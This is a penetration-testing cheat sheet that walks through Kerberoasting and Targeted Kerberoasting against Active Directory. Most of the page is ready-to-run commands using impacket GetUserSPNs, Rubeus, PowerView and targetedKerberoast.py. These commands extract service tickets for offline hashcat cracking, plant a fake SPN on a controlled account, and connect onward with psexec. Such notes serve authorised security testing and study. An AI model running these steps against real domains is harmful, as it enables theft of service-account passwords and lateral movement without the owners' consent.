Kerberoasting

In the second phase of Kerberos, the client requests the TGS from the KDC to access a resource of a Service Principal Name (SPN). No authorization checks, permissions, etc. are applied, as this is done by the SPN when it receives the TGS. This means that the attacker can request the TGS for a given SPN and then crack it offline to obtain the SPN password.

NOTE: If the SPN is running in the context of a computer account, a managed service account, or a group-managed service account, the password will be randomly generated, complex, and 120 characters long, making it impossible to crack. For this reason, you should focus on SPNs running in the context of user accounts.

Attack

Linux

impacket-GetUserSPNs will attempt to list and get the TGS for the logged in account's SPNs. You must have the credentials of a domain user to perform the extraction.

Synchronize time with domain controller with ntpdate or rdate.

sudo ntpdate <IP_DC>

Listing SPN Accounts

GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>

Pull all TGS tickets

GetUserSPNs.py -request -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]

Get TGS ticket for a specific account

GetUserSPNs.py -request-user <NAME> -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]

Offline cracking of output with hashcat (-m 13100)

Windows

Since we are already in a windows system belonging to the domain, we do not need to specify username and password.

We can use Rebus to get the TGS for the logged in account's SPNs.

.\Rubeus.exe kerberoast /stats

.\Rubeus.exe kerberoast /outfile:<OutputFile> [/user:<NAME_TARGET>] [/tgtdeleg]

tgtdeleg up to Windows server 2016 allows you to request ticket in RC4, much easier to crack.

Or with PowerView (old and new)

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser -Identity <NAME_TARGET> | Get-DomainSPNTicket -Format Hashcat

Offline cracking of file <OutputFile> with hashcat (ex. -m 13100)

Connect

psexec.py <DOMAIN>/<USER>@<IP>
psexec.py <DOMAIN>/<USER>@<MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP>

Targeted Kerberoasting

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.

With targetedKerberoast.py

targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-ip <IP>

With kerberos authentication (-k), we have to use the TGT, otherwise we get the error “ 'NoneType' object has no attribute 'getCredential' ”.

impacket-getTGT <DOMAIN>/<USER>:<PASS> -dc-ip <IP>
export KRB5CCNAME=./<USER>.ccache
targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-host <HOSTNAME> -v -k

For some tools (ex. evil-winrm), it may be necessary to set the /etc/krb5.conf file. The minimum structure is as follows:

[libdefaults]
  default_realm = <DOMAIN.COM>

[realms]
  <DOMAIN.COM> = {
    kdc = <DC.DOMAIN.COM>
  }

$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)

Creating a Fake SPN with PowerView (old and new)

Import-Module .\PowerView.ps1
Set-DomainObject -Credential $Cred -Identity <TARGET> -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Kerberoasting with Rubeus

.\Rubeus.exe kerberoast /user:<USER> /nowrap

Cleanup fake SPN

Set-DomainObject -Credential $Cred -Identity <TARGET> -Clear serviceprincipalname -Verbose

Last updated 2 months ago

Was this helpful?